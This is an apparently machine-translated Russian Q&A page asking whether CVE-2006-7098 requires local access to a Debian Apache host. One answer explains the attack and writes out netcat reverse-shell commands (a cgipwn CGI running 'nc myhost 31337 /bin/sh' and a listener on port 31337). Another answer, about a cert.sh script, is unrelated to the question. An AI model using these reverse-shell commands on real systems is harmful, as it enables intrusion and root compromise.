Требует ли CVE 2006-7098 доступа (входа в систему) к уязвимому Debian?

Сценарий ожидает аргумент при выполнении. Этот аргумент - каталог, в котором находится *. Apk .

Аргумент вызывается в сценарии строкой cd $ 1 , так аргументы вызываются в сценариях оболочки.

Пожалуйста, попробуйте перезапустить ваш скрипт следующим образом: sh cert.sh и посмотрите, решит ли это вашу проблему?

Кроме того, до ] для цикла добавьте строки rm -rf other и rm -rf none , чтобы удалить ошибки, относящиеся к существующим папкам.

1
08.08.2016, 14:22
1 ответ

Итак, перечитав информацию об эксплойте несколько раз, я усомнился в словосочетании "локальный злоумышленник": означает ли это, что уязвимость может быть использована только из та же машина, на которой запущен уязвимый Apache? В этом случае я понимаю, что злоумышленник должен заранее иметь учетные данные действительного пользователя на машине с разрешениями на управление apache (что значительно снизит применимость атаки).

Да, вы правы. На самом деле веб-сервер является целевым сервером с этой уязвимостью, myhost - это машина злоумышленника.

Поместив двоичный файл cgipwn в каталог / cgi-bin веб-сервера и открыв http: // webserver / cgi-bin / cgipwn ? ... , злоумышленник пытается запустить nc myhost 31337 / bin / sh на веб-сервере от имени пользователя, запустившего Apache (обычно root ) .

Злоумышленник ранее запускал nc -vvv -l -p 31337 на myhost , чтобы принять соединение nc с веб-сервера . Если все пойдет хорошо, злоумышленник получит доступ к интерактивному сеансу / bin / sh , запущенному от имени стартового пользователя Apache на веб-сервере .

1
27.01.2020, 23:50

Теги

Похожие вопросы